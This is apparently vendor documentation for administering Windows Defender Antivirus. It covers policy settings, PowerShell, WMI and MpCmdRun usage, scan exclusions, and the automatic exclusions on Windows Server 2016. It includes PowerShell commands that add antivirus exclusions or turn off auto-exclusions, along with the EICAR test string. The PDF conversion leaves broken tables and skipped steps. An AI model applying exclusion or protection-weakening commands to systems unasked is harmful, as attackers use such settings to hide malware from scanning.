on behavior monitoring policy settings
Real-time protection Configure local setting override to turn Prevent or allow users to locally modify
on real-time protection policy settings
Real-time protection Define the maximum size of Enable and configure Windows
downloaded files and attachments to be Defender Antivirus always-on protection
scanned and monitoring
Real-time protection Monitor file and program activity on Enable and configure Windows
your computer Defender Antivirus always-on protection
and monitoring
Real-time protection Scan all downloaded files and Enable and configure Windows
attachments Defender Antivirus always-on protection
and monitoring
Real-time protection Turn off real-time protection Enable and configure Windows
Defender Antivirus always-on protection
and monitoring
Real-time protection Turn on behavior monitoring Enable and configure Windows

and monitoring
Real-time protection Turn on process scanning whenever Enable and configure Windows
real-time protection is enabled Defender Antivirus always-on protection
and monitoring
Real-time protection Turn on raw volume write notifications Enable and configure Windows
and monitoring
Real-time protection Configure monitoring for incoming and Enable and configure Windows
outgoing file and program activity Defender Antivirus always-on protection
and monitoring
Remediation Configure local setting override for the Prevent or allow users to locally modify
time of day to run a scheduled full scan policy settings
Remediation Specify the day of the week to run a Configure scheduled Windows Defender
scheduled full scan to complete Antivirus scans
remediation
Remediation Specify the time of day to run a Configure scheduled Windows Defender
scheduled full scan to complete Antivirus scans
remediation
Reporting Configure Watson events Not used
Reporting Configure Windows software trace Not used

preprocessor components
Reporting Configure WPP tracing level Not used
Reporting Configure time out for detections in Not used

critically failed state

non-critical failed state

recently remediated state
Reporting Configure time out for detections Not used

requiring additional action
Reporting Turn off enhanced notifications Configure the notifications that appear
on endpoints
Root Turn off Windows Defender Antivirus Not used (This setting must be set to
Not configured to ensure any installed
third-party antivirus apps work
correctly)
Root Define addresses to bypass proxy server Not used
Root Define proxy auto-config (.pac) for Not used

connecting to the network
Root Define proxy server for connecting to Not used

the network
Root Configure local administrator merge Prevent or allow users to locally modify
behavior for lists policy settings
Root Allow antimalware service to startup Configure remediation for Windows

with normal priority Defender Antivirus scans
Root Allow antimalware service to remain Configure remediation for Windows

running always Defender Antivirus scans
Root Turn off routine remediation Configure remediation for Windows

Root Randomize scheduled task times Configure scheduled scans for Windows
Defender Antivirus
Scan Allow users to pause scan Prevent users from seeing or interacting
with the Windows Defender Antivirus
user interface
Scan Check for the latest virus and spyware Manage event-based forced updates
definitions before running a scheduled
scan
Scan Define the number of days after which a Manage updates for endpoints that are
catch-up scan is forced out of date
Scan Turn on catch up full scan Manage updates for endpoints that are
out of date
Scan Turn on catch up quick scan Manage updates for endpoints that are
out of date
Scan Configure local setting override for Prevent or allow users to locally modify
maximum percentage of CPU utilization policy settings
schedule scan day policy settings
scheduled quick scan time policy settings
scheduled scan time policy settings
Scan Configure local setting override for the Prevent or allow users to locally modify
scan type to use for a scheduled scan policy settings
Scan Create a system restore point Configure remediation for Windows

Scan Turn on removal of items from scan Configure remediation for Windows
history folder Defender Antivirus scans
Scan Turn on heuristics Enable and configure Windows

and monitoring
Scan Turn on e-mail scanning Configure scanning options in Windows

Defender Antivirus
Scan Turn on reparse point scanning Configure scanning options in Windows

Defender Antivirus
Scan Run full scan on mapped network drives Configure scanning options in Windows
Defender Antivirus
Scan Scan archive files Configure scanning options in Windows

Defender Antivirus
Scan Scan network files Configure scanning options in Windows

Defender Antivirus
Scan Scan packed executables Configure scanning options in Windows

Defender Antivirus
Scan Scan removable drives Configure scanning options in Windows

Defender Antivirus
Scan Specify the maximum depth to scan Configure scanning options in Windows
archive files Defender Antivirus
Scan Specify the maximum percentage of Configure scanning options in Windows

CPU utilization during a scan Defender Antivirus
Scan Specify the maximum size of archive files Configure scanning options in Windows
to be scanned Defender Antivirus
Scan Specify the day of the week to run a Configure scheduled scans for Windows
scheduled scan Defender Antivirus
Scan Specify the interval to run quick scans Configure scheduled scans for Windows
per day Defender Antivirus
Scan Specify the scan type to use for a Configure scheduled scans for Windows
Scan Specify the time for a daily quick scan Configure scheduled scans for Windows
Defender Antivirus
Scan Specify the time of day to run a Configure scheduled scans for Windows
Scan Start the scheduled scan only when Configure scheduled scans for Windows
computer is on but not in use Defender Antivirus
Security intelligence updates Allow definition updates from Microsoft Manage updates for mobile devices and
Update virtual machines (VMs)
Security intelligence updates Allow definition updates when running Manage updates for mobile devices and
on battery power virtual machines (VMs)
Security intelligence updates Allow notifications to disable definitions Manage event-based forced updates
based repots to Microsoft MAPS
Security intelligence updates Allow real-time definition updates based Manage event-based forced updates
on reports to Microsoft MAPS
Security intelligence updates Check for the latest virus and spyware Manage event-based forced updates
definitions on startup
Security intelligence updates Define file shares for downloading Manage Windows Defender Antivirus
definition updates protection and definition updates
Security intelligence updates Define the number of days after which a Manage updates for endpoints that are
catch up definition update is required out of date
Security intelligence updates Define the number of days before Manage updates for endpoints that are
spyware definitions are considered out out of date
of date
Security intelligence updates Define the number of days before virus Manage updates for endpoints that are
definitions are considered out of date out of date
Security intelligence updates Define the order of sources for Manage Windows Defender Antivirus
downloading definition updates protection and definition updates
Security intelligence updates Initiate definition update on startup Manage event-based forced updates
Security intelligence updates Specify the day of the week to check for Manage when protection updates
definition updates should be downloaded and applied
Security intelligence updates Specify the interval to check for Manage when protection updates
Security intelligence updates Specify the time to check for definition Manage when protection updates
updates should be downloaded and applied
Security intelligence updates Turn on scan after Security intelligence Configure scheduled scans for Windows
update Defender Antivirus
Threats Specify threat alert levels at which Configure remediation for Windows
default action should not be taken when Defender Antivirus scans
detected
Threats Specify threats upon which default Configure remediation for Windows
action should not be taken when Defender Antivirus scans
detected
Related topics
Use System Center Configuration Manager and
Microsoft Intune to configure and manage Windows
Defender Antivirus
Applies to:
If you are using System Center Configuration Manager or Microsoft Intune to manage the endpoints on your
network, you can also use them to manage Windows Defender Antivirus scans.
In some cases, the protection will be labeled as Endpoint Protection, although the engine is the same as that used
by Windows Defender Antivirus.
See the Endpoint Protection library on docs.microsoft.com for information on using Configuration Manager.
For Microsoft Intune, consult the Microsoft Intune library and Configure device restriction settings in Intune.
Related topics
Use PowerShell cmdlets to configure and manage
Applies to:
You can use PowerShell to perform various functions in Windows Defender. Similar to the command prompt or
command line, PowerShell is a task-based command-line shell and scripting language designed especially for
system administration, and you can read more about it at the PowerShell hub on MSDN.
For a list of the cmdlets and their functions and available parameters, see the Defender cmdlets topic.
PowerShell cmdlets are most useful in Windows Server environments that don't rely on a graphical user interface
(GUI) to configure software.
NOTE
PowerShell cmdlets should not be used as a replacement for a full network policy management infrastructure, such as System
Center Configuration Manager, Group Policy Management Console, or Windows Defender Antivirus Group Policy ADMX
templates.
Changes made with PowerShell will affect local settings on the endpoint where the changes are deployed or made.
This means that deployments of policy with Group Policy, System Center Configuration Manager, or Microsoft
Intune can overwrite changes made with PowerShell.
You can configure which settings can be overridden locally with local policy overrides.
PowerShell is typically installed under the folder %SystemRoot%\system32\WindowsPowerShell.
Use Windows Defender Antivirus PowerShell cmdlets:
1. Click Start, type powershell, and press Enter.
2. Click Windows PowerShell to open the interface.
3. Enter the command and parameters.
NOTE
You may need to open an administrator-level version of PowerShell. Right-click the item in the Start menu, click Run as
administrator and click Yes at the permissions prompt.
To open online help for any of the cmdlets type the following:
Get-Help <cmdlet> -Online
Omit the -online parameter to get locally cached help.
Related topics
Use Windows Management Instrumentation (WMI) to
configure and manage Windows Defender Antivirus
Applies to:
Windows Management Instrumentation (WMI) is a scripting interface that allows you to retrieve, modify, and
update settings.
Read more about WMI at the Microsoft Developer Network System Administration library.
Windows Defender Antivirus has a number of specific WMI classes that can be used to perform most of the same
functions as Group Policy and other management tools. Many of the classes are analogous to Defender PowerShell
cmdlets.
The MSDN Windows Defender WMIv2 Provider reference library lists the available WMI classes for Windows
Defender Antivirus, and includes example scripts.
Changes made with WMI will affect local settings on the endpoint where the changes are deployed or made. This
means that deployments of policy with Group Policy, System Center Configuration Manager, or Microsoft Intune
can overwrite changes made with WMI.
Related topics
Configure and manage Windows Defender Antivirus
with the mpcmdrun.exe command-line tool
Applies to:
You can perform various Windows Defender Antivirus functions with the dedicated command-line tool
mpcmdrun.exe.
This utility can be useful when you want to automate Windows Defender Antivirus use.
You can find the utility in %ProgramFiles%\Windows Defender\MpCmdRun.exe. You must run it from a command
prompt.
NOTE
You may need to open an administrator-level version of the command prompt. Right-click the item in the Start menu, click
Run as administrator and click Yes at the permissions prompt.
The utility has the following commands:
MpCmdRun.exe [command] [-options]
COMMAND DESCRIPTION
-? or -h Displays all available options for this tool
-Scan [- ScanType #] [- File [- DisableRemediation] [- Scans for malicious software

BootSectorScan]] [- Timeout ] [- Cancel]
-Trace [- Grouping #] [- Level #] Starts diagnostic tracing
-GetFiles Collects support information
-GetFilesDiagTrack Same as Getfiles but outputs to temporary DiagTrack folder
-RemoveDefinitions [- All] Restores the installed Security intelligence to a previous

backup copy or to the original default set
-RemoveDefinitions [- DynamicSignatures] Removes only the dynamically downloaded Security

intelligence
-RemoveDefinitions [- Engine] Restores the previous installed engine
-SignatureUpdate [- UNC | -MMPC] Checks for new Security intelligence updates
-Restore [- ListAll | [[- Name ] [- All] | [- FilePath ]] [- Path ]] Restores or lists quarantined item(s)
COMMAND DESCRIPTION
-AddDynamicSignature [- Path] Loads dynamic Security intelligence
-ListAllDynamicSignatures Lists the loaded dynamic Security intelligence
-RemoveDynamicSignature [- SignatureSetID] Removes dynamic Security intelligence
-CheckExclusion -path Checks whether a path is excluded
Related topics
Customize, initiate, and review the results of
Windows Defender Antivirus scans and remediation
Applies to:
You can use Group Policy, PowerShell, and Windows Management Instrumentation (WMI) to configure
Windows Defender Antivirus scans.
In this section
TOPIC DESCRIPTION
Configure and validate file, folder, and process-opened file You can exclude files (including files modified by specified
exclusions in Windows Defender Antivirus scans processes) and folders from on-demand scans, scheduled
scans, and always-on real-time protection monitoring and
scanning
Configure Windows Defender Antivirus scanning options You can configure Windows Defender Antivirus to include
certain types of email storage files, back-up or reparse
points, and archived files (such as .zip files) in scans. You can
also enable network file scanning
Configure remediation for scans Configure what Windows Defender Antivirus should do
when it detects a threat, and how long quarantined files
should be retained in the quarantine folder
Configure scheduled scans Set up recurring (scheduled) scans, including when they
should run and whether they run as full or quick scans
Configure and run scans Run and configure on-demand scans using PowerShell,
Windows Management Instrumentation, or individually on
endpoints with the Windows Security app
Review scan results Review the results of scans using System Center
Configuration Manager, Microsoft Intune, or the Windows
Security app
Configure and validate exclusions for Windows
Applies to:
You can exclude certain files, folders, processes, and process-opened files from Windows Defender Antivirus
scans.
The exclusions apply to scheduled scans, on-demand scans, and always-on real-time protection and
monitoring. Exclusions for process-opened files only apply to real-time protection.
Exclusions can be useful to avoid incorrect detections on files or software that are unique or customized to your
organization.
Windows Server 2016 also features automatic exclusions that are defined by the server roles you enable. See
the Windows Defender Antivirus exclusions on Windows Server 2016 topic for more information and a list of
the automatic exclusions.
WARNING
Defining exclusions lowers the protection offered by Windows Defender Antivirus. You should always evaluate the risks
that are associated with implementing exclusions, and you should only exclude files that you are confident are not
malicious.
In this section
TOPIC DESCRIPTION
Configure and validate exclusions based on file name, Exclude files from Windows Defender Antivirus scans based
extension, and folder location on their file extension, file name, or location
Configure and validate exclusions for files opened by Exclude files from scans that have been opened by a specific
processes process
Configure Windows Defender Antivirus exclusions on Windows Server 2016 includes automatic exclusions, based
Windows Server on the defined server role. You can also add custom
exclusions.
Configure and validate exclusions based on file extension and
folder location
Applies to:
IMPORTANT
Windows Defender Advanced Threat Protection does not adhere to Windows Defender Antivirus exclusion settings. This means that any
Windows Defender exclusions, no matter how you created them, are not applied by Windows Defender ATP.
You can exclude certain files from Windows Defender Antivirus scans by modifying exclusion lists.
Generally, you shouldn't need to apply exclusions. Windows Defender Antivirus includes a number of automatic exclusions based on
known operating system behaviors and typical management files, such as those used in enterprise management, database
management, and other enterprise scenarios and situations.
NOTE
Automatic exclusions apply only to Windows Server 2016 and above.
TIP
The default antimalware policy we deploy at Microsoft doesn't set any exclusions by default.
EXCLUSION EXAMPLES EXCLUSION LIST
Any file with a specific extension All files with the .test extension, anywhere on Extension exclusions
the machine
Any file under a specific folder All files under the c:\test\sample folder File and folder exclusions
A specific file in a specific folder The file c:\sample\sample.test only File and folder exclusions
A specific process The executable file c:\test\process.exe File and folder exclusions
This means the exclusion lists have the following characteristics:

Folder exclusions will apply to all files and folders under that folder, unless the subfolder is a reparse point. Reparse point
subfolders must be excluded separately.
File extensions will apply to any file name with the defined extension if a path or folder is not defined.
IMPORTANT
The use of wildcards such as the asterisk (*) will alter how the exclusion rules are interpreted. See the Use wildcards in the file name and folder
path or extension exclusion lists section for important information about how wildcards work.
You cannot exclude mapped network drives. You must specify the actual network path.
Folders that are reparse points that are created after the Windows Defender Antivirus service starts and that have been added to the exclusion
list will not be included. You must restart the service (by restarting Windows) for new reparse points to be recognized as a valid exclusion target.
To exclude files opened by a specific process, see Configure and validate exclusions for files opened by processes.
The exclusions apply to scheduled scans, on-demand scans, and real-time protection.
IMPORTANT
By default, local changes made to the lists (by users with administrator privileges, including changes made with PowerShell and
WMI) will be merged with the lists as defined (and deployed) by Group Policy, Configuration Manager, or Intune. The Group Policy
lists will take precedence in case of conflicts.
You can configure how locally and globally defined exclusions lists are merged to allow local changes to override managed
deployment settings.
Configure the list of exclusions based on folder name or file extension

Use Intune to configure file name, folder, or file extension exclusions:
Use Configuration Manager to configure file name, folder, or file extension exclusions:
See How to create and deploy antimalware policies: Exclusion settings for details on configuring System Center Configuration
Use Group Policy to configure folder or file extension exclusions:
NOTE
If you specify a fully qualified path to a file, then only that file is excluded. If a folder is defined in the exclusion, then all files and subdirectories
under that folder are excluded.
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group Policy
Object you want to configure and click Edit.
4. Double-click the Path Exclusions setting and add the exclusions:
c. Enter each folder on its own line under the Value name column. If you are entering a file, ensure you enter a fully
qualified path to the file, including the drive letter, folder path, filename, and extension. Enter 0 in the Value column.
5. Click OK.
6. Double-click the Extension Exclusions setting and add the exclusions:
c. Enter each file extension on its own line under the Value name column. Enter 0 in the Value column.
7. Click OK.
Use PowerShell cmdlets to configure file name, folder, or file extension exclusions:
Using PowerShell to add or remove exclusions for files based on the extension, location, or file name requires using a combination of
three cmdlets and the appropriate exclusion list parameter. The cmdlets are all in the Defender module.
<cmdlet> -<exclusion list> "<item>"
Remove item from the list Remove-MpPreference
The following are allowed as the <exclusion list>:
EXCLUSION TYPE POWERSHELL PARAMETER
All files with a specified file extension -ExclusionExtension
All files under a folder (including files in subdirectories), or a specific file -ExclusionPath
IMPORTANT
If you have created a list, either with Set-MpPreference or Add-MpPreference , using the Set-MpPreference cmdlet again will overwrite the
existing list.
For example, the following code snippet would cause Windows Defender AV scans to exclude any file with the .test file extension:
Add-MpPreference -ExclusionExtension ".test"
See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more information on how
to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instruction (WMI ) to configure file name, folder, or file extension exclusions:
ExclusionExtension
ExclusionPath
The use of Set, Add, and Remove is analogous to their counterparts in PowerShell: Set-MpPreference , Add-MpPreference , and
Remove-MpPreference .

Use the Windows Security app to configure file name, folder, or file extension exclusions:
Use wildcards in the file name and folder path or extension exclusion lists
You can use the asterisk * , question mark ? , or environment variables (such as %ALLUSERSPROFILE% ) as wildcards when defining
items in the file name or folder path exclusion list. The way in which these wildcards are interpreted differs from their usual usage in
other apps and languages, so you should read this section to understand their specific limitations.
IMPORTANT
There are key limitations and usage scenarios for these wildcards:
Environment variable usage is limited to machine variables and those applicable to processes running as an NT AUTHORITY\SYSTEM account.
You cannot use a wildcard in place of a drive letter.
An asterisk * in a folder exclusion will stand in place for a single folder. Use multiple instances of \*\ to indicate multiple nested folders
with unspecified names.
The following table describes how the wildcards can be used and provides some examples.
WILDCARD USE IN FILE AND FILE USE IN FOLDER EXCLUSIONS EXAMPLE USE EXAMPLE MATCHES>
EX TENSION EXCLUSIONS
* (asterisk) Replaces any number of Replaces a single folder. 1. C:\MyData\*.txt 1.

characters. Use multiple * with folder 2. C:\somepath\*\Dat C:\MyData\notes.txt
Only applies to files in the slashes \ to indicate a 2. Any file in:
last folder defined in the multiple, nested folders. 3. C:\Serv\*\*\Backup
argument. After matching to the C:\somepath\Archives\Data
number of wilcarded and and its
named folders, all subfolders
subfolders will also be
included. C:\somepath\Authorized\Data
and its
subfolders
3. Any file in:
C:\Serv\Primary\Denied\Backup
and its
subfolders
C:\Serv\Secondary\Allowed\Backup
and its
subfolders
? (question mark) Replaces a single Replaces a single 1. C:\MyData\my?.zip 1.
character. character in a folder 2. C:\somepath\?\Dat C:\MyData\my1.zip
Only applies to files in the name. a 2. Any file in
last folder defined in the After matching to the 3. C:\somepath\test0 C:\somepath\P\Data
argument. number of wilcarded and ?\Data and its subfolders
named folders, all 3. Any file in
subfolders will also be C:\somepath\test01\Data
included. and its subfolders
Environment variables The defined variable will Same as file and extension 1. %ALLUSERSPROF 1.
be populated as a path use. ILE%\CustomLogFi C:\ProgramData\CustomLogFiles\Folder
when the exclusion is les
evaluated.
IMPORTANT
If you mix a file exclusion argument with a folder exclusion argument, the rules will stop at the file argument match in the matched folder, and will
not look for file matches in any subfolders.
For example, you can exclude all files that start with "date" in the folders c:\data\final\marked and c:\data\review\marked by using the rule
argument c:\data\*\marked\date*.*.
This argument, however, will not match any files in subfolders under c:\data\final\marked or c:\data\review\marked.

You can retrieve the items in the exclusion list with Intune, System Center Configuration Manager, MpCmdRun, PowerShell, or the
IMPORTANT
Retrieve the status of all Windows Defender Antivirus preferences. Each of the lists will be displayed on separate lines, but the
items within each list will be combined into the same line.
Write the status of all preferences to a variable, and use that variable to only call the specific list you are interested in. Each use of
Add-MpPreference is written to a new line.

NOTE
Checking exclusions with MpCmdRun requires Windows Defender Antivirus CAMP version 4.18.1812.3 (released in December 2018) or later.
Review the list of exclusions alongside all other Windows Defender Antivirus preferences by using PowerShell:
Get-MpPreference
In the following example, the items contained in the ExclusionExtension list are highlighted:
Use the following code snippet (enter each line as a separate command); replace WDAVprefs with whatever label you want to name
the variable:
$WDAVprefs.ExclusionExtension
$WDAVprefs.ExclusionPath
In the following example, the list is split into new lines for each use of the Add-MpPreference cmdlet:
Validate exclusions lists with the EICAR test file

You can validate that your exclusion lists are working by using PowerShell with either the Invoke-WebRequest cmdlet or the .NET
WebClient class to download a test file.
In the following PowerShell snippet, replace test.txt with a file that conforms to your exclusion rules. For example, if you have
excluded the .testing extension, replace test.txt with test.testing. If you are testing a path, ensure you run the cmdlet within that path.
Invoke-WebRequest "http://www.eicar.org/download/eicar.com.txt" -OutFile "test.txt"
If Windows Defender Antivirus reports malware, then the rule is not working. If there is no report of malware, and the downloaded
file exists, then the exclusion is working. You can open the file to confirm the contents are the same as what is described on the
EICAR testfile website.
You can also use the following PowerShell code, which calls the .NET WebClient class to download the testfile - as with the
Invoke-WebRequest cmdlet; replace c:\test.txt with a file that conforms to the rule you are validating:
$client = new-object System.Net.WebClient

$client.DownloadFile("http://www.eicar.org/download/eicar.com.txt","c:\test.txt")
If you do not have Internet access, you can create your own EICAR test file by writing the EICAR string to a new text file with the
following PowerShell command:
[io.file]::WriteAllText("test.txt",'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
You can also copy the string into a blank text file and attempt to save it with the file name or in the folder you are attempting to
exclude.
Related topics
Configure exclusions for files opened by processes
Applies to:
You can exclude files that have been opened by specific processes from Windows Defender Antivirus scans.
EXCLUSION EXAMPLE
Any file on the machine that is opened by any process with a Specifying "test.exe" would exclude files opened by:
specific file name c:\sample\test.exe
d:\internal\files\test.exe
Any file on the machine that is opened by any process under Specifying "c:\test\sample\*" would exclude files opened by:
a specific folder c:\test\sample\test.exe
c:\test\sample\test2.exe
c:\test\sample\utility.exe
Any file on the machine that is opened by a specific process Specifying "c:\test\process.exe" would exclude files only
in a specific folder opened by c:\test\process.exe
When you add a process to the process exclusion list, Windows Defender Antivirus won't scan files opened by
that process, no matter where the files are located. The process itself, however, will be scanned unless it has also
been added to the file exclusion list.
The exclusions only apply to always-on real-time protection and monitoring. They don't apply to scheduled or
on-demand scans.
Changes made with Group Policy to the exclusion lists will show in the lists in the Windows Security app.
However, changes made in the Windows Security app will not show in the Group Policy lists.
You can add, remove, and review the lists for exclusions in Group Policy, System Center Configuration Manager,
Microsoft Intune, and with the Windows Security app, and you can use wildcards to further customize the lists.
You can also use PowerShell cmdlets and WMI to configure the exclusion lists, including reviewing your lists.
By default, local changes made to the lists (by users with administrator privileges; this includes changes made
with PowerShell and WMI) will be merged with the lists as defined (and deployed) by Group Policy,
Configuration Manager, or Intune. The Group Policy lists will take precedence in the case of conflicts.
You can configure how locally and globally defined exclusions lists are merged to allow local changes to override
managed deployment settings.
Configure the list of exclusions for files opened by specified processes

Use Microsoft Intune to exclude files that have been opened by specified processes from scans:
Use System Center Configuration Manager to exclude files that have been opened by specified
See How to create and deploy antimalware policies: Exclusion settings for details on configuring System Center
Use Group Policy to exclude files that have been opened by specified processes from scans:
templates.
4. Double-click Process Exclusions and add the exclusions:
c. Enter each process on its own line under the Value name column. See the example table for the
different types of process exclusions. Enter 0 in the Value column for all processes.
5. Click OK.
Use PowerShell cmdlets to exclude files that have been opened by specified processes from scans:
Using PowerShell to add or remove exclusions for files that have been opened by processes requires using a
combination of three cmdlets with the -ExclusionProcess parameter. The cmdlets are all in the Defender
module.
<cmdlet> -ExclusionProcess "<item>"
Remove items from the list Remove-MpPreference
IMPORTANT
If you have created a list, either with Set-MpPreference or Add-MpPreference , using the Set-MpPreference cmdlet
again will overwrite the existing list.
For example, the following code snippet would cause Windows Defender AV scans to exclude any file that is
opened by the specified process:
Add-MpPreference -ExclusionProcess "c:\internal\test.exe"
See [Manage antivirus with PowerShell cmdlets](use-powershell-cmdlets-windows-defender-Windows

Defender Antivirus.md) and Defender cmdlets for more information on how to use PowerShell with Windows
Defender Antivirus.
Use Windows Management Instruction (WMI ) to exclude files that have been opened by specified
ExclusionProcess
The use of Set, Add, and Remove is analogous to their counterparts in PowerShell: Set-MpPreference ,
Add-MpPreference , and Remove-MpPreference .

Use the Windows Security app to exclude files that have been opened by specified processes from
scans:
Use wildcards in the process exclusion list

The use of wildcards in the process exclusion list is different from their use in other exclusion lists.
In particular, you cannot use the question mark ? wildcard, and the asterisk * wildcard can only be used at the
end of a complete path. You can still use environment variables (such as %ALLUSERSPROFILE%) as wildcards
when defining items in the process exclusion list.
The following table describes how the wildcards can be used in the process exclusion list:
WILDCARD USE EXAMPLE USE EXAMPLE MATCHES
* (asterisk) Replaces any number of C:\MyData\* Any file opened by

characters C:\MyData\file.exe
? (question mark) Not available - -
Environment variables The defined variable will be %ALLUSERSPROFILE Any file opened by
populated as a path when %\CustomLogFiles\fil C:\ProgramData\Cus
the exclusion is evaluated e.exe tomLogFiles\file.exe

You can retrieve the items in the exclusion list with MpCmdRun, PowerShell, System Center Configuration
Manager, Intune, or the Windows Security app.
Retrieve the status of all Windows Defender Antivirus preferences. Each of the lists will be displayed on
separate lines, but the items within each list will be combined into the same line.
Write the status of all preferences to a variable, and use that variable to only call the specific list you are
interested in. Each use of Add-MpPreference is written to a new line.

NOTE
Checking exclusions with MpCmdRun requires Windows Defender Antivirus CAMP version 4.18.1812.3 (released in
December 2018) or later.
Review the list of exclusions alongside all other Windows Defender Antivirus preferences by using
PowerShell:
Get-MpPreference
Use the following code snippet (enter each line as a separate command); replace WDAVprefs with whatever
label you want to name the variable:
$WDAVprefs.ExclusionProcess
Related topics
Configure Windows Defender Antivirus exclusions
on Windows Server
Applies to:
Windows Defender Antivirus on Windows Server 2016 computers automatically enrolls you in certain
exclusions, as defined by your specified server role. See the end of this topic for a list of these exclusions.
These exclusions will not appear in the standard exclusion lists shown in the Windows Security app.
You can still add or remove custom exclusions (in addition to the server role-defined automatic exclusions) as
described in these exclusion-related topics:
Custom exclusions take precedence over automatic exclusions.
TIP
Custom and duplicate exclusions do not conflict with automatic exclusions.
Windows Defender Antivirus uses the Deployment Image Servicing and Management (DISM ) tools to
determine which roles are installed on your computer.
Opt out of automatic exclusions

In Windows Server 2016, the predefined exclusions delivered by Security intelligence updates only exclude the
default paths for a role or feature. If you installed a role or feature in a custom path, or you want to manually
control the set of exclusions, you need to opt out of the automatic exclusions delivered in Security intelligence
updates.
WARNING
Opting out of automatic exclusions may adversely impact performance, or result in data corruption. The exclusions that
are delivered automatically are optimized for Windows Server 2016 roles.
NOTE
This setting is only supported on Windows Server 2016. While this setting exists in Windows 10, it doesn't have an effect
on exclusions.
TIP
Since the predefined exclusions only exclude default paths, if you move NTDS and SYSVOL to another drive or path
different than the original one, you would have to manually add the exclusions using the information here .
You can disable the automatic exclusion lists with Group Policy, PowerShell cmdlets, and WMI.
Use Group Policy to disable the auto-exclusions list on Windows Server 2016:
templates.
4. Double-click Turn off Auto Exclusions and set the option to Enabled. Click OK.
Use PowerShell cmdlets to disable the auto-exclusions list on Windows Server 2016:
Set-MpPreference -DisableAutoExclusions $true
Use Windows Management Instruction (WMI ) to disable the auto-exclusions list on Windows Server
2016:
DisableAutoExclusions

List of automatic exclusions

The following sections contain the exclusions that are delivered with automatic exclusions file paths and file
types.
Default exclusions for all roles
This section lists the default exclusions for all Windows Server 2016 roles.
Windows "temp.edb" files:
%windir%\SoftwareDistribution\Datastore\*\tmp.edb
%ProgramData%\Microsoft\Search\Data\Applications\Windows\*\*.log
Windows Update files or Automatic Update files:
%windir%\SoftwareDistribution\Datastore\*\Datastore.edb
%windir%\SoftwareDistribution\Datastore\*\edb.chk
%windir%\SoftwareDistribution\Datastore\*\edb*.log
%windir%\SoftwareDistribution\Datastore\*\Edb*.jrs
%windir%\SoftwareDistribution\Datastore\*\Res*.log
Windows Security files:
%windir%\Security\database\*.chk
%windir%\Security\database\*.edb
%windir%\Security\database\*.jrs
%windir%\Security\database\*.log
%windir%\Security\database\*.sdb
Group Policy files:
%allusersprofile%\NTUser.pol
%SystemRoot%\System32\GroupPolicy\Machine\registry.pol
%SystemRoot%\System32\GroupPolicy\User\registry.pol
WINS files:
%systemroot%\System32\Wins\*\*.chk
%systemroot%\System32\Wins\*\*.log
%systemroot%\System32\Wins\*\*.mdb
%systemroot%\System32\LogFiles\
%systemroot%\SysWow64\LogFiles\
File Replication Service (FRS ) exclusions:
Files in the File Replication Service (FRS ) working folder. The FRS working folder is specified in
the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Working Directory
%windir%\Ntfrs\jet\sys\*\edb.chk
%windir%\Ntfrs\jet\*\Ntfrs.jdb
%windir%\Ntfrs\jet\log\*\*.log
FRS Database log files. The FRS Database log file folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\Currentcontrolset\Services\Ntfrs\Parameters\DB Log File
Directory
-%windir%\Ntfrs\*\Edb*.log
The FRS staging folder. The staging folder is specified in the registry key
HKEY_LOCAL_MACHINE\System\Currentcontrolset\Services\NtFrs\Parameters\Replica
Sets\GUID\Replica Set Stage
%systemroot%\Sysvol\*\Nntfrs_cmp*\
The FRS preinstall folder. This folder is specified by the folder
Replica_root\DO_NOT_REMOVE_NtFrs_PreInstall_Directory
%systemroot%\SYSVOL\domain\DO_NOT_REMOVE_NtFrs_PreInstall_Directory\*\Ntfrs*\
The Distributed File System Replication (DFSR ) database and working folders. These
folders are specified by the registry key
HKEY_LOCAL_MACHINE\System\Currentcontrolset\Services\DFSR\Parameters\Replication
Groups\GUID\Replica Set Configuration File
NOTE
For custom locations, see Opt out of automatic exclusions.
%systemdrive%\System Volume Information\DFSR\$db_normal$

%systemdrive%\System Volume Information\DFSR\FileIDTable_*
%systemdrive%\System Volume Information\DFSR\SimilarityTable_*
%systemdrive%\System Volume Information\DFSR\*.XML
%systemdrive%\System Volume Information\DFSR\$db_dirty$
%systemdrive%\System Volume Information\DFSR\$db_clean$
%systemdrive%\System Volume Information\DFSR\$db_lostl$
%systemdrive%\System Volume Information\DFSR\Dfsr.db
%systemdrive%\System Volume Information\DFSR\*.frx
%systemdrive%\System Volume Information\DFSR\*.log
%systemdrive%\System Volume Information\DFSR\Fsr*.jrs
%systemdrive%\System Volume Information\DFSR\Tmp.edb
Process exclusions
%systemroot%\System32\dfsr.exe
%systemroot%\System32\dfsrs.exe
Hyper-V exclusions:
This section lists the file type exclusions, folder exclusions, and process exclusions that are
delivered automatically when you install the Hyper-V role
*.vhd
*.vhdx
*.avhd
*.avhdx
*.vsv
*.iso
*.rct
*.vmcx
*.vmrs
Folder exclusions:
%ProgramData%\Microsoft\Windows\Hyper-V
%ProgramFiles%\Hyper-V
%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots
%Public%\Documents\Hyper-V\Virtual Hard Disks
Process exclusions:
%systemroot%\System32\Vmms.exe
%systemroot%\System32\Vmwp.exe
SYSVOL files:
%systemroot%\Sysvol\Domain\*.adm
%systemroot%\Sysvol\Domain\*.admx
%systemroot%\Sysvol\Domain\*.adml
%systemroot%\Sysvol\Domain\Registry.pol
%systemroot%\Sysvol\Domain\*.aas
%systemroot%\Sysvol\Domain\*.inf
%systemroot%\Sysvol\Domain\*.Scripts.ini
%systemroot%\Sysvol\Domain\*.ins
%systemroot%\Sysvol\Domain\Oscfilter.ini
Active Directory exclusions
This section lists the exclusions that are delivered automatically when you install Active Directory Domain
Services.
NTDS database files. The database files are specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database File
%windir%\Ntds\ntds.dit
%windir%\Ntds\ntds.pat
The AD DS transaction log files. The transaction log files are specified in the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\Database Log Files
%windir%\Ntds\Res*.log
%windir%\Ntds\Edb*.jrs
%windir%\Ntds\Ntds*.pat
%windir%\Ntds\TEMP.edb
The NTDS working folder. This folder is specified in the registry key
